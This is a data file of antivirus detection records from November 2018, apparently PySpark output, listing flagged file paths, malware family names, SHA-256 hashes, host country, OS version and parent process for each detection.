  Row(detection=Row(filename='avscan-20181104-105620-4c2bec5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba0a0959\\AVSCAN-20181104-105559-4980C93B\\AVSCAN-20181104-105620-4C2BEC5B', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='ba6c820d9281c89bd6fb700d5485676e7e4a5450ff7f1d66ca8d237933515100', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:56:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220337-06f3abe8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220337-06F3ABE8', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:03:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='\\\\?\\C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192641-89bc26ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8121bda9\\AVSCAN-20181104-191248-159A46FF\\AVSCAN-20181104-192641-89BC26AC', filesize=512000, name='Adware/Elex.njjta.#M1.#R1'), hash='1294817883d4f043f82d7762fb29805f6f55a8bab3b804fd15a2cb4a3e415a04', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:26:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8a55', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8a55', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='98ad5e6bf455c4eed4efd451639e60c1458fa196dfc0cd246098aee6bcb36ac4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T16:44:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160343-f0671519', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9dca68d4\\AVSCAN-20181104-160244-E8EDE9E8\\AVSCAN-20181104-160343-F0671519', filesize=384000, name='TR/Black.Gen2.#M1.#R1'), hash='1d9bba05408fdc74c1839a8890ab5092359bda910db9219287afe6a77cabe8e5', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:03:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205432-e158ebeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8042744\\AVSCAN-20181104-204911-B6642F9B\\AVSCAN-20181104-205432-E158EBEB', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:24:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='الروافع.exe', filepath='\\?\\M:\\3 اعدادى\\6ابتدائى\\العلوم\\الروافع.exe', filesize=6144000, name='W32/Viking.AT.#M1.#R1'), hash='c598020e9df7e65d599416e8eabd4deb43816d0f32fa6a26b986de9dfa796497', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:31:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090955-a508e899', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090955-A508E899', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:09:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215158-88ed4437', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215158-88ED4437', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8892', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8892', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205100-ffafd880', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_312b1817\\AVSCAN-20181104-205034-FC074942\\AVSCAN-20181104-205100-FFAFD880', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:51:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_4_12_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_4_12_4.html', filesize=224000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='34d7ae0eb9935da504f719a191b702e7f01b7b7d911c8ac0c3a2a352b3f2b0c9', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\PROGRAM FILES (X86)\\INSTALLSHIELD INSTALLATION INFORMATION\\{0D7CD0D9-4A88-4A63-8F91-3F4E8F371768}\\setup.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1d6c4348ae0900e569860c24239ab64d3033f05516b277c784479a9054e96e80', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\EgisTec MyWinLocker\\x86\\mwlDaemon.exe', parentsize=349552, timestamp='2018-11-04T18:20:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nst5494.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='E:\\cnteudo pers\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T18:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:31:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:00:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gstars patch.exe', filepath='i:\\pro evolution soccer 2013 caf 4\\gStars Patch.exe', filesize=20032000, name='W32/Ramnit.CD.#M1.#R1'), hash='b2d6709a4bc8f92eade00ed17357fd3e47af465c53d6f542be6fb9a49d2dc777', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-201305-0147f7f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e186474e\\AVSCAN-20181102-200915-E44DB580\\AVSCAN-20181102-201305-0147F7F2', filesize=3200000, name='HEUR/AGEN.1035084.#M1.#R1'), hash='df60313db2a35ef52b9925d233ee8036d349ccaec47fe4762ff48246b46846fb', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dworrzrt.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\dwORRZrt.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fp748stff.exe', filepath='C:\\ProgramData\\TopodeaeL\\FP748sTFf.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline='--engine=2 --session-id=cDbijIOXtd8WenbNwIeAyH49x9DNDxZ4JSy5p4j7 --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\32.167.200\\software_reporter_tool.exe', parentsize=13830776, timestamp='2018-11-02T07:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T15:56:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nmfirststart.exe', filepath='C:\\Program Files\\Common Files\\Ahead\\Lib\\NMFirstStart.exe', filesize=256000, name='W32/Expiro.QQ.#M1.#R1'), hash='b7f835cf70e4769543397e9efa7d46aae8bdc5dee4f8e3f9de9db8082ecc4e2f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T23:33:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133039-6c66a982', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10768840\\AVSCAN-20181102-132954-66BA481E\\AVSCAN-20181102-133039-6C66A982', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kaelin.exe', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kaelin.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.hcs\\dayz_lite\\versions\\1.6.4-Forge9.11.1.965\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='cdf41d9e8a357f572458bd89d98164e9647bfcbcdab0637605dad18cb9614585', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:33:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nss9C09.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T00:52:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100902-8603ebf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-100902-8603EBF2', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a34039da41e8bd1498f64832b01f916ae51e7f2a6d844cec49d24f167ab9058a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-035928-4faad862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03248238\\AVSCAN-20181102-035515-1A5A3B07\\AVSCAN-20181102-035928-4FAAD862', filesize=832000, name='TR/Snarasite.807b68.#M1.#R1'), hash='807b6827c5a58b9bf1505ddd4556e81aa286e90a324b8d263f95e5a31e9fe122', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121040-bd6ac941', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de04ce2d\\AVSCAN-20181102-115649-566DF889\\AVSCAN-20181102-121040-BD6AC941', filesize=20000, name='TR/Trash.Gen.#M1.#R1'), hash='bf695e84d0730d9072677b5f9c5e1fdc0a69a4702628c48cdd8a8c38b25b7b45', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverquery.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\driverquery.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96f25ee77a87eda83cc41b471e698901aaa78954056ec35403055298a3d60d49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='\\\\?\\E:\\Downloads\\RESPALDO_31-01-2017\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T15:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zet.exe', filepath='c:\\users\\X\\appdata\\roaming\\zet.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:29:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143640-26bde7b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d82171dd\\AVSCAN-20181102-142906-E4DC5505\\AVSCAN-20181102-143640-26BDE7B9', filesize=256000, name='Adware/Zdengo.avh.#M1.#R1'), hash='d6e8774332bcf61ee4893ef77787e5c72fa76dee13817992e6886994ecefbccb', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:36:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b59536869372b5de77a9f94b94e1c2650c8e59d91748b22560a538763cad817c.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B59536869372B5DE77A9F94B94E1C2650C8E59D91748B22560A538763CAD817C.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b59536869372b5de77a9f94b94e1c2650c8e59d91748b22560a538763cad817c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:51:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='psftp.exe', filepath='C:\\Program Files (x86)\\HTC\\HTC Sync Manager\\psftp.exe', filesize=412000, name='W32/Sality.AT.#M1.#R1'), hash='f4f05a4c250e852a540c7aad9858041d3f916e6eb72ac6bd5bfaf5ab5727c6b2', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T12:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='9d474e14281cc8d51b8c02cf81a14415f94770561036fe42db4bf164613d9714', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6787480, timestamp='2018-11-02T03:11:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075717-f54989e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-075717-F54989E8', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vywwtxht21u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updateallgenius.exe', filepath='C:\\Program Files (x86)\\allgenius\\updateallgenius.exe', filesize=640000, name='ADWARE/BrowseFox.Gen7.#M300.#R601892'), hash='906937bf36632307b1bd7331c8bc87b4805c68d92f0700dd3eb61f2331604b12', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='QA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081949-c13c7d64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-081949-C13C7D64', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vgqbo2eivww\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mpstd.exe', filepath='\\\\192.168.0.5\\desha_itd\\5.) chao_mylo\\DRIVER PACK FOR ALL\\Drivers\\Audio\\REALTEK\\XP64_MCE_XP_2K_ME_98(A380)\\Ap\\Mpstd.exe', filesize=3904000, name='W32/Viking.AT.#M1.#R1'), hash='a1c01dc447e868681b0977bd8708f10e5b09963f6aaa45a0f315f68dddbd50ae', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2373784, timestamp='2018-11-02T13:26:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064345-2c96a054', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064345-2C96A054', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064433-31a5805f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064433-31A5805F', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-015937-9d72c674', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-015937-9D72C674', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='bdd1e6ce49412a68dd6a913c0ffcba1fde42cb1f0f5e2921f60b0076324a656a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ytdsetup.exe', filepath='F:\\\xa0\\YTDSetup.exe', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848960, timestamp='2018-11-04T06:14:57Z'), dt=datetime.date(2018, 11, 4)),
